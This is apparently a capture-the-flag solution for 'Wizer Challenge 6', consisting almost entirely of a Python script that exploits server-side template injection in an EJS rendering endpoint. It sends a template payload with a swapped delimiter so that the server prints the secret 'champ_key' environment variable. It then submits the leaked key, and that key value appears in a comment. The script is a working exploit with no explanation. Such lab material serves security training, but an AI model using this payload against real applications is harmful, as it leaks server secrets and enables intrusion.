Wizer - Challenge 6 - ejs SSTI

Exploit

import requests

url = "https://call6.vercel.app/renderInvite"



r = requests.post(
    url,
    json={
        "template": "<?= process.env.champ_key ?>",
        "delimiter": "?"
    },
)

print(r.text)


# 7G75EDA67593A5544GE123AB55890F06564ABC124



r = requests.post(
    url,
    json={
        "champ_key": "7G75EDA67593A5544GE123AB55890F06564ABC124"
    },
)

print(r.text)